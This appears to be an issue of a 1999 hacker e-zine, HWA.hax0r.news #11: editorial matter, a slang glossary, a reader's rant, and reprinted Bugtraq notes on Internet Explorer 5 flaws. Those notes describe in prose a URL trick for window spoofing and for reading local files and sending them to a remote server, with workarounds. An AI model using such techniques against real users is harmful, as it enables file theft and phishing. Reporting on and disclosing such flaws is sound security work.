[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 11 Volume 1 1999 March 24th 99 ========================================================================== Anyone want to send in comments on the current site or ideas for a new site layout, please do so, i'm no html wizard and all my sites tend to end up looking pretty much the same, if you feel creative and want to put a demo site together or point me in the direction of a site layout you like please do so, i'm getting bored with the haphazard layout of the current site and could use some creative input on ideas for layout as it's a bit crowded currently and only looks half decent in 1024x768 mode .... tnx - cruciphux@dok.org Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, it's a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? 
there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #11 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #11 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the editor.................................................. 
=--------------------------------------------------------------------------= 03.0 .. MSIE 5 is still susceptible to frame spoofing and other bugs..... 03.1 .. MSIE 5 problems carried over from earlier versions.............. 04.0 .. WintrasherGOLD................................................... 05.0 .. LDAP Buffer overflow............................................. 06.0 .. HP security bulletin: HPTerm exploit............................. 07.0 .. Eudora buffer overflow exploit................................... 08.0 .. Netscape SUSE crash exploit...................................... 09.0 .. Hotmail to fix potential security problem ....................... 10.0 .. NcFTPd Exploit (from Feb but missed in earlier issues)........... 10.1 .. NcFTPd proxy exploitation....................................... 10.2 .. Mail.local sendmail exploit advisory............................ 11.0 .. Its in the bag, much ado about nothing .......................... 12.0 .. [ISN] DNS Spoofing finally resolved?............................. 13.0 .. [ISN] IETF working group seeks to improve security alerting .... 14.0 .. Report: Military computers vulnerable............................ 15.0 .. International raid cracks child porn ring ....................... 15.1 .. ACPM : Anti-Child Porn Militia wants YOU........................ 16.0 .. Hacking (Cracking) contest, win a Netfinity server!.............. 17.0 .. eBay owned....................................................... 18.0 .. Aussies to ban Net pr0n.......................................... 19.0 .. More on the ProMail email trojan program ........................ 20.0 .. C41 - Pentagon’s cyberdefenses criticized........................ 21.0 .. [ISN] NetBus 'Trojan' Splits Security Community.................. 22.0 .. [ISN] Cracking tools get smarter ................................ 23.0 .. [ISN] British Defense Ministry Dismisses Hacker Report........... 24.0 .. [ISN] Encryption key would lock up criminals..................... 
25.0 .. [ISN] Crypto: Under lock and key ................................ 26.0 .. HRC's interview with Goat Security (IRC LOG)..................... 27.0 .. Year 2000 Network and Distributed System Security ............... 28.0 .. What would YOU do with Bill Gates' SSN?.......................... 29.0 .. MDT monitoring (Mobile Data Terminal as used by the Police)...... 30.0 .. Bugtraq: Lotus notes security advisory........................... 31.1 .. WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)....... 32.0 .. Bugtraq: OpenSSL and SSLeay Advisory............................. 33.0 .. OpenBSD security advisories...................................... 34.0 .. Oracle in insecure at initial install............................ 35.0 .. GnuPlot buffer overflow exploit ................................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. .......................................................................... HA.HA .. Humour and puzzles ............................................ HA.HA1 .. Humourous newsbytes from Innerpulse.com (www.innerpulse.com). .......................................................................... HOW.TO .. New section: "How to hack" by our illustrious editor part 2..... SITE.1 .. Featured site, http://www.real-secure.org/ with ezine excerpt... on IP Spoofing ................................................. .......................................................................... H.W .. Hacked Websites .............................................. A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 "Heh heh heh heh heh,.why don't you listen to this recording with interest? 
Mary Mary, kill the hairy sonuvabitch...he he he and now for something completely different" - Wierdmix'90 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? 
- unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. 
If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. 
- cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. 
- Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. 
Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. 
CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondents/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondents please check in or be removed by next issue. I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January, I lost it, please resend. 
N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 What's in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Can I see you naked?" - Bob Barker Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. It's almost like buying a clue. Anyway..on with the show .. 
- Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempt at eschewing obfuscation by obscuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavy equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . 
An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. 
;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. 
* #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Attrition has updated its archive of cracked sites with one of the biggest archives on the net http://www.attrition.org check it out ... Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed This is "off-topic" but its something I thought i'd share with the readers if you have any comments on the writing i'd like to hear them and so would phiregod so give us an email, we need more writers like this to bring a dose of reality to our lives now and then... - Cruciphux@dok.org From: "liquid phire" To: cruciphux@dok.org Subject: a new one Date: Tue, 23 Mar 1999 19:04:34 PST Mime-Version: 1.0 Content-type: text/plain when i watch tv all i see are commercials for heartburn stuffs, what is with that? 
are the subjects of american culture rotting from the inside out? did their bodies realize their sins before their minds did? is this happening with everyone? the world is going downhill fast, and we wont find out until we hit the bottom whether or not our air bags will work. this is a new car commercial, gaudy and loud, "buy or die!" they scream from their tabloid pulpits. our churches have turned into department stores, the very children that are our hope are selling their lives out for a dime bag and a place to stay. we dress in jail rags, chant the rants of the very people that are bringing this pseudo-life to its knees. athletes are yelling the rhymes of corporations at anyone who will listen. our heroes are not fighting for equality or freedom, they are throwing hype out about cop killers and hits of coke. you cant eat money, you cant take it with you when you die, and it sure as hell wont stop a bullet. america is the prostitute of the free and imprisoned world, thousands died so we can enjoy cable from our matching houses with our matching lives. god is for those who are wasting their lives and need another one to spare. we fought for what now? so that rapists and murderers could walk free while political prisoners rotted in their cells? parents work all day so their children can attend public schools that promote insecurity and train the next generation to be faceless and money driven. the smart are encouraged to work for large companies or military services, the down on luck are pushed into low paying jobs and inferior lives. the country will prosper and a revolution will be breathing down our necks. i missed the sermon with the explanation, the end is near and the lord saves. mc donalds will cater the apocalypse, and nike will provide the official shoe. god sold out to miramax for the film, tarantino has claimed the screenplay, and look out for the soundtrack by backstreet boys. 
salvation is being sold with an order of fries, healing comes with a free drink, faith by armani. the angels have encountered a glass ceiling, sexual harassment allegations in hell, the government has become "nightly action news". blood and gore, right and wrong, good and bad, pleasure and pain extremes are desired in a moderated world. the second coming will have its own line of clothes, the blood of the lamb is copyrighted. heaven and the inferno have merged and the NASDAQ is reaching all time highs. justice has been fucked over, her sword carried off and her measures used for heroin. the flag is used as a doormat in other countries, our anthem sung by drunk veterans in the middle of the night. this feels like a moment of revelation, but its just another day in Las Vegas. i wake up in the middle of the night screaming for solace, i cry for a calm sea and a worthy ship. like a panther truth runs through the sleeping city, merging with the gray and spreading over the streets in lies. we are grasping every bit of cabbie wisdom we can find, slipping over the edge trying to hold on to religion, government, and "family". we have a thirst that encompasses our lives, and it can only be quenched with blood. "i am the alpha and the omega, the beginning and the end." i dont remember if it was jesus or bill gates that said that. please excuse all grammar/spelling mistakes. 
phiregod
liquidphire@hotmail.com
www.geocities.com/siliconvalley/sector/4121

Get Your Private, Free Email at http://www.hotmail.com

================================================================

@HWA

02.0 From the editor.#9
~~~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");
    /*
     * So Microsoft continues to suck, they released IE5 (wooHOO)
     * and whaddya know it still has a slew of bugs duh...all those
     * frame spoofing bugs and other java monsters are still in there
     * so I hope u guys that keep hitting the site with MSIE will
     * begin to smarten up and see that Netscape although not the
     * most secure program either is a damn sight better than MSIE
     * even on a bad day ... peace out rockin with issue 11
     */
    printf("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:
hwa@press.usmc.net

Complaints and all nastygrams and mailbombs can go to /dev/nul; nukes, synfloods and papasmurfs to 127.0.0.1; private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 MSIE 5 is still susceptible to frame spoofing and other bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 19 Mar 1999 11:46:01 +0100
From: Most Psychoid
To: BUGTRAQ@netspace.org
Subject: IE5 - same vulnerabilities, only some fixed

Hello,

The new Microsoft Internet Explorer 5 (I checked Version: 5.00.0910.1309) still allows Frame Spoofing and reading of local Files as described by Georgi Guninski (see http://www.whitehats.com/guninski/read.html).

Another new feature named "AutoComplete" stores entries (which also may be passwords). Just another new source for passwords which had not been saved in IE 4.x.

The Crash-bugs seem to be removed. I could not crash my default installed IE 5 using the known exploits.
So far,
psychoid

---
Sent through Global Message Exchange - http://www.gmx.net

03.1 MSIE 5 problems carried over from earlier versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There is a Javascript security bug in Internet Explorer 4.x (patched), which circumvents "Cross-frame security" and opens several security holes.

The problem is: if you add '%01someURL' after an 'about:somecode' URL, IE thinks that the document is loaded from the domain of 'someURL'. Very strange?

Some of the bugs are:

1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available (See Demos below)

2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled into thinking he is browsing a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available (See below)

3) Reading AUTOEXEC.BAT using TDC. Demo is available: (See below)

Workaround: Disable Javascript

Demo #1 Guninski's IE 4 file reading bug.

There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
The filename must be known.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page.

Demo #2 Guninski's IE 4 window spoofing.

There is a bug in Internet Explorer 4.x (patched) which allows "window spoofing".
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.

After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled into thinking he is browsing a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number.
The bug may be exploited using HTML mail message. The exploit uses Javascript.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page.

Demo #3 Guninski's IE 4 reading AUTOEXEC.BAT.

There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
This will try to read C:\AUTOEXEC.BAT using TDC.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.

Workaround: Disable Javascript.
Go to Georgi Guninski's home page.

This was reported in an earlier version and last issue of the zine but is included here for new readers who may be unaware or have not read the earlier issues. - Ed

04.0 Wintrasher GOLD
~~~~~~~~~~~~~~~

This program bears some looking at. When I first saw it on packetstorm I thought the same thing I thought when I first heard of Genius's release, and that's pure scepticism; anyways I checked it out and it's pretty damn cool, you might want to check it out too. 1.6M, here's the blurb from packetstorm:

Wintrasher GOLD v5.2 - Wintrasher is a powerful utility that can be used to configure hidden Windows settings, acting as a Windows Shell and Desktop Management Tool. Many of the settings that change the way Windows works and looks are hidden in the overwhelming registry, or in configuration files. WT-GOLD gives you an easy way to configure those settings. This version also includes backup of critical system files, improved active desktop-calendar, popup-reminder, and much much more.

Features:

- Get your computer to start in pure DOS again.
